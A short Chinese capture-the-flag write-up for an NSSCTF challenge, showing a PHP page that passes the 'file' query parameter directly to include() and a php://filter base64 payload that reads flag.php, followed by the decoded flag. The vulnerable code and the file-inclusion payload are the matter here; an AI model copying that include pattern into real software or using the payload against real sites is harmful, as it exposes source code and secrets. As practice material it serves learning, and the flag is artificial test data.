题目
<html>
<title>Here's a secret. Can you find it?</title>
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
highlight_file(__FILE__);
}
?>
</html>读取flag
/?file=php://filter/read=convert.base64-encode/resource=flag.php
使用bp解码
拿下flag
NSSCTF{00bb1bc4-f867-45af-b88b-02b18cd6725b};